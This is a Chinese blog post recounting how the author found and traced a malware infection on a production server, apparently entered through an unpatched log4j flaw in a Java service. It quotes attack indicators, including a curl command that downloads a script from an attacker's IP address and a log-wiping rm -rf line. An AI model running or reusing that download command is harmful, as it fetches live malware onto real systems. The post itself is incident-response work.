记录一次线上被病毒攻击的事件

已于 2022-10-09 11:18:03 修改
阅读量432 收藏
点赞数 1
分类专栏: 择维士 技术分享 网络 文章标签: 网络 服务器 运维
于 2022-10-09 11:08:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scugxl/article/details/127222009
版权
择维士 同时被 3 个专栏收录
15 篇文章 1 订阅
订阅专栏
技术分享
12 篇文章 0 订阅
订阅专栏
网络
5 篇文章 0 订阅
订阅专栏

文章目录

Abstract

本文记录了在产品中遇到的关于被黑客攻击的事件始末. 这里面会讲述到如何通过监控工具来帮助普通程序员与黑客进行"斗智斗勇"的故事.

被攻击

记录Pcap4j使用的一次异常调查和分析中我描述了如何对网络进行全方位的监控. 之所以有这个是因为某台生产服务器会被黑客经常进行攻击. 我们也尝试过用防火墙禁用某些ip或者端口,发现这个黑客也会时不时变更协议和ip 导致我们一直很烦恼这个事情. 这个攻击在某一段时间大量发送网络数据包 (峰值流量达到50MB/s). 监控如图:在这里插入图片描述
我们也收到了告警:
在这里插入图片描述

调查现场

1.发现进程

因为网络带宽被大量占用,导致ssh也很不稳定,时不时会出现掉线的情况.
先用top查看高占用可以进程, 尝试kill -1 (不用kill -9是因为我发现它会有watchdog进程会自动重启): 这个sdjd进程十分可疑:
在这里插入图片描述

2.临时恢复

为了能完整的结束掉进程, 使用ps -ef 列出所有包含该关键字的进程然后全部结束,结束后网络情况恢复.
在这里插入图片描述

3.根因调查

为了能够知道这个进程是谁启动的, 我查看了自己产品的日志, 我们的完全监控
下一代监控产品和服务支持对启动进程的完全监控和日志查看. 这个病毒其实很隐蔽,会在启动后把所有日志文件删掉.`在这里插入图片描述
比如这样的一行

rm 3696944 3696856 0 /bin/rm -rf sdjdshdgdsdsfsfausjashsaggsafsfaa.sparc

代表执行了 rm -rf命令. 进程id是3696944, 父进程id是3696856. 通过这样不断的溯源,找到最开始的可以进程:
在这里插入图片描述
这个病毒通过进程2541799这个进程启动并且尝试用curl下载病毒脚本:
curl http://135.148.58.239:1980/aktualisieren.sh
该病毒会清除history和iptables
在这里插入图片描述
当我用ps -ef | grep 2541799发现这个进程竟然还在, 还是某个java进程:
在这里插入图片描述
想到这里突然想到会不是通过log4j的漏洞进行攻击了呢?之前升级过所有的模块. 可能这个是漏网之鱼, 从该进程日志中我发现有如下可疑的日志:
Invalid character found in method name
在这里插入图片描述
这个与log4j的漏洞非常相似. 可以参考这里
这里贴出的异常堆栈:

16:48:44.338 [http-nio-8080-exec-1] INFO  o.a.coyote.http11.Http11Processor - Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name [00x0c0x020x010x01`0x070x020x010x030x040x000x800x00...]. HTTP method names must be tokens
    at

总结

  1. 监控产品对于系统运维人员是非常重要的. 有了它才能让我们在问题,事故发生时有迹可循. 我们的监控产品便对广度和深度上做了很好的平衡.
  2. 保持对常用开源软件的漏洞跟踪也很有必要.

参考链接

  1. 择维士监控官网
  2. log4j漏洞攻击展示
  3. 记录Pcap4j使用的一次异常调查和分析
择维士
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第一团购网
12-06
【第一团购网】是一个基于ASP(Active Server Pages)技术构建的在线团购平台。ASP是微软公司推出的一种服务器端脚本语言,它允许开发者在网页上动态生成内容,从而实现交互性和实时更新。在这个项目中,ASP被用于...
2021CTF工业信息安全技能大赛(杭州站)
08-02
8. **案例研究**:通过分析历史上的工业信息安全事件,如震网病毒、乌克兰电网攻击等,学习应对策略。 通过这样的大赛,不仅可以提高参与者的技术能力,也能促进工业信息安全领域的研究和发展,为现实世界中的安全...
一次被木马攻击记录
qq_53058639的博客
02-15 337
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等;
记录一次全班电脑中病毒事件——文件夹都成快捷方式【超难受】
weixin_73357470的博客
09-14 502
以前,也听说过什么黑客红客的,只是觉得离自己很远很远,自己的技术也没有那么牛,也不会涉及这行业。另一方面来说,我也没有什么黑客需要的东西,估计也不会中病毒吧,殊不知,就在前几天,我也遇到了这么个奇葩事儿~图片来源于网络
一次对RushQL勒索病毒的处理记录
weixin_38467835的博客
04-21 1142
近日,检测到公司的一台数据库服务器中出现了RushQL病毒,进行处理后目前可正常使用该数据库,将中毒原因和处理过程记录如下: 一、RushQL病毒简介 RushQL专门针对Oracle数据库设计、具备一定潜伏期和隐蔽性的勒索病毒,该病毒是由“SQL RUSH Team”组织发起,最早于2016年11月出现,其主要感染方式是将破解版或绿色版的PL/SQL中的login.sql和Afterconnec...
病毒漏洞汇总记录
weixin_34211761的博客
11-02 189
1. 微软:***利用Windows漏洞传播Duqu病毒 赛门铁克研究人员认为,***通过邮件发送感染病毒的Word文档,从而传播Duqu。该公司研究员凯文-哈利(Kevin Haley)称,在接收者打开文件后,PC就会感染病毒,***者便可控制该计算机,并可以潜入机构网络窃取数据。(彪赫)http://tech.sina.com.cn/it/2011-11-02/1050...
6. 事件记录
showna的专栏
03-28 5121
当一个典型的软件应用程序必须在某些特殊情况下让使用者知道时,通常会使用视觉或听觉返回的方式。软件大多数会给予这种类型事件报告的享受,因为它可以建立一个重要的假定:当它正在执行,而一个人类坐在机器的前面。然而,大部份的伺服软件并不能在上述之假设情形中执行。因此,服务器开发者使用文件或者一些其他类似持久稳固的储存器来保存经由软件报告的事件记录。然后系统管理者便可以经常地察看记录文件并且持续的监
参考资料-安全教育培训记录表GDAQ1203.zip
02-06
文件中的“安全教育培训记录表GDAQ1203.xls”很可能是一个电子表格,用于记录一次安全教育活动的相关信息。通常,这类表格会包含以下内容: 1. 参训人员:记录参加培训的员工姓名、部门和职位,以便了解覆盖范围...
新型冠状病毒肺炎疫情感想体会与反思5篇.docx
02-22
综上所述,通过以上分析可以看出,《新型冠状病毒肺炎疫情感想体会与反思》一文不仅记录了疫情初期人们的感受和思考,更重要的是,它提醒我们在面对类似公共卫生事件时应该具备的态度——既要看到人性中最美好的一面...
服务器设备巡检表.docx
06-25
12. **系统漏洞**:扫描系统漏洞,保持软件更新,以降低被黑客攻击的风险。 13. **系统防病毒**:确保防病毒软件运行正常,定期更新病毒库,防止病毒感染。 14. **备份磁盘工作**:检查备份设备的运行状态,确保...
线上病毒处理
weixin_34228662的博客
11-27 106
产生原因 服务器出口流量爆满查看ps netstat都被系统替换了,先用iftop查出流量最大的,drop掉-A INPUT -s 140.205.81.26/32 -j DROP在查找走的udp协议 先吧udp禁止-A OUTPUT -d 10.0.80.11/32 -p udp -m udp --sport 53 -j ACCEPT-A OUTPUT -d 10.0.80...
Windows 系统安全事件应急响应
daheshuiman的博客
04-13 1705
日志记录了系统中硬件、软件和系统问题的信息,同时还监视着系统中发生的事件。当服务器被入侵或者系统(应用)出现问题时,管理员可以根据日志迅速定位问题的关键,再快速处理问题,从而极大地提高工作效率和服务器的安全性。Widdows 通过自带事件查看器管理日志,使用命令打开,或者 Windows 10 搜索框直接搜索事件查看器,或者使用开始菜单Windows 管理工具事件查看器打开。Windows 日志位置日志审核策略,使用命令Wifi.etlWindows 日志系统日志。
一次勒索病毒攻击事件的处理过程
weixin_40111182的博客
08-02 2453
一次勒索病毒攻击事件的处理过程 记一次勒索病毒攻击事件的处理过程 11时13分收到同事反馈,其电脑防病毒软件检测到勒索病毒或变种的攻击事件攻击源:192.168.111.222 告知被攻击用户动作 紧急关闭445端口 查找攻击源使用人 根据IP-MAC记录表及上网行为管理AC上用户管理-IP-MAC绑定未查到攻击源ip。确定该用户为研发人员,禁止上网 利用nmap查看攻击源信息 发现主机名...
一次勒索病毒后的应急响应
kali_Ma的博客
08-21 4420
前言 群晖是一种NAS(网络附属存储)系统,在生活中主要扮演个人私有云角色,可以将文件存储于 NAS,并通过网页浏览器或手机应用程序可实现存储和共享,同时还提供的丰富应用以方便管理应用。借助群晖提供的 QuickConnect 快连服务,无需随身携带存储设备,即可以随时随地访问NAS。因为这些优点,群晖往往被当做是NAS的首选。 但偏偏这次被上勒索病毒了,通过资料查询发现该病毒早在2019年安全专家就已经分析过并已提供预警信息,一旦感染,其中的文件都会被加密,并通过留下的文件索要比特币。经过初步判断是通过w
Linux挖矿病毒事件应急响应演练(dbused木马)
Li-D的博客
11-17 7283
环境准备 **攻击机**:kali(192.168.130.131) **靶机**:Ubuntu(192.168.130.138) 攻击阶段 (1)通过端口扫描工具,对服务器进行端口探测尝试,发现开启了22端口; (2)通过hydra工具暴力尝试破解用户名和密码,发现暴破成功,用户名为:root/root (3)在攻击机上准备挖矿病毒 (4)接下来进行攻击入侵,等待脚本运行 应急响应 检测阶段 (1)查看服务器系统整体运行情况,发现名为dbused的可疑进程大量占用系统CPU使用率 (2)查看是否存
一次真实的网络攻击取证纪实
chengfangang的专栏
12-29 3759
随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民 服务,银行和证券机构也都开始依托互联网来进行金融和股票交易,但是随着方便的同时也同时带来了新的 随着信息技术的发展,越来越多的人都喜欢用计算机办公,发邮件,建设自己的个人站点,公司建立自己的企业站点,政府也逐渐的采取了网上办公,更好的为人民 服务,
【随笔】VRRP+MSTP
weixin_41997073的博客
08-06 401
VRRP 使用选择策略从路由器组中选出一台作为主控,负责 ARP 响应和 IP 数据包转发,组中的其他路由器作为备份的角色处于待命状态。当主控空路由发生故障时,备份路由器能在几秒的时间延后升级的主路由器。一个VRRP组中只能由一台处于主控角色的路由器,可以有一个或多个备份角色的路由器。开销值越低,表示该链路的传输速度越快,路由器会优先选择这些链路进行数据传输。抢占模式的意义, 当 R1 路由器中断又恢复后,则恢复 R1 的主导地位。设计采用主备模式,将VRRP组内多个路由设备都映射为一个虚拟路由设备。
如何计算UDP校验和
ZhongUncle的博客
08-07 936
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
【HAProxy】haproxy七层代理
最新发布
m0_64570996的博客
08-08 990
超级超级超级详细哦哦!!!!!
一次线上tomcat worker线程在一个流量高峰后居高不下的问题及排查解决过程
12-07
在一个流量高峰期间,我们的网站开始出现了性能问题,特别是Tomcat的worker线程居高不下。这个问题对我们的系统稳定性和用户体验产生了严重影响,因此我们立即进行了排查和解决。 首先,我们使用工具监控了Tomcat的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值